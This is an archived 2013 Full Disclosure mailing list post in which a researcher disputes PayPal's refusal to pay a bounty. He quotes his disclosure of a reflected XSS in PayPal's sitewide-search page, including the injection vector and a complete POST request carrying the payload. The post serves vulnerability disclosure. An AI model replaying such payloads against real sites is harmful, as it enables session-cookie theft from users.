Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

PayPal Bug Bounty Controversy - I found the XSS first: They still didn't pay me
From: Shubham Shah <shahshubham369 () gmail com>
Date: Thu, 30 May 2013 00:38:16 +1000

Heya everyone,
*On the 11th of May, 2013, I reported an XSS that affected the very same field that Kugler reported, on the same domain of "paypal.com"* - However, I too did not receive a bug bounty. My name is Shubham Shah, also a security researcher. And coincidentally but similarly to Robert Kugler. I too found a cross site scripting vulnerability on PayPal's "sitewide-search" module. My exploit was similar to his, it affected the same parameters except I had used an alternate vector - after fiddling with the search system for some time. The real controversy is however, I am *under 18 years old* and I, in the past have received money from their program under my older siblings PayPal account, with permission. When I reported the XSS pretty much the same as Kugler reported, I was "not eligible for a bounty" because "Another researcher already discovered the bug". Please take a look at the attached emails and screenshots.

Here is what I sent to the Site Security team via their PGP portal:
====================================================

To Paypal Site Security Team,
Recently I have discovered an XSS vulnerability which affects the wide majority of Paypal.com/* This XSS vulnerability is a POST 
type, on the affected script "searchscr?cmd=_sitewide-search"
Affected domains:
https://www.paypal.com/*/cgi-bin/searchscr?cmd=_sitewide-search
(The * indicates any country code)
for example:
https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/ie/cgi-bin/searchscr?cmd=_sitewide-search
https://www.paypal.com/de/cgi-bin/searchscr?cmd=_sitewide-search
etc.

The XSS vector successfully executes on Internet Explorer and Firefox (newest builds). It does not execute on Chrome, 
but it is possible to create a custom vector to do so. If needed, I can create such a vector.

XSS Vector: '"<script >alert(document.cookie)</script> The bypass used is the ['"] in front of any HTML or script 
injection (without the square brackets)

This exploit has the capability of stealing a large number of user cookies in a short period of time with cookie 
stealers. If needed I can also provide a PoC for this. This can be done stealthily and would cause major mayhem if 
exploited!

Here is some proof of concept images:
http://pasteboard.co/2lU54Wuj.png  (PNG file hosted on pasteboard.co) - document.cookie xss on firefox

Here is my personal HTTP Headers for making this exploit execute:

POSThttps://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search  1.1
Host:www.paypal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:https://www.paypal.com/au/cgi-bin/searchscr?cmd=_sitewide-search
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 369
locale_val=en_AU&qrystr_val=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&countstr_val=AU&serverame_val=www.paypal.com&searchResultUrlsCount_val=&queryString_acInput=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&queryString=%27%22%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&buttonSearch=Search&beta_user=false&form_charset=UTF-8

Thank you for your time in reading this, Shubham Shah

====================================================

Screenshots to prove date of submission and actual message:
http://pbrd.co/18ugpSY <= Date submitted proof
http://pbrd.co/18ugFRZ <= Proof of message

On 05/13/2013 7:47 AM I got told by paypal that:
====================================================

Hi Shubham,

We regret to inform you that your bug submission was not eligible for a bounty for the following reason.  Another 
researcher already discovered the bug.

Thank you for your participation. We take pride in keeping PayPal the safer place for online payment.

Thank you,
PayPal Security Team

====================================================
Once again, here are some screenshots:
http://pbrd.co/18uhtGD <= Proof of date I submitted it
http://pbrd.co/18uhMkI <= Proof of message - As I could not take a print screen of the far right side, I included the barebones - print version of the message - so others can verify the date I received the response.

Thanks for reading through,
I actually didn't get anything from PayPal similar to Robert, but I was able to report the vulnerability 8 days earlier than Robert - and still did not receive any acknowledgement. Frankly, I was okay with it and moved on. I do not actually have much against the bounty as I have been paid numerous times. PayPal has honoured many of my vulnerabilities. However, I can tell you that recently none of my security submissions have been honoured - they state that all my newer submissions have been already reported - I have no actual way of verifying if they have or not, so I just move on and continue pentesting with spirit

Also, Robert, I am amazed by your work done with security regarding Mozilla! They were awesome finds! Solid stuff man, I hope one day that I can move onto learning more about application security.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • PayPal Bug Bounty Controversy - I found the XSS first: They still didn't pay me Shubham Shah (May 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault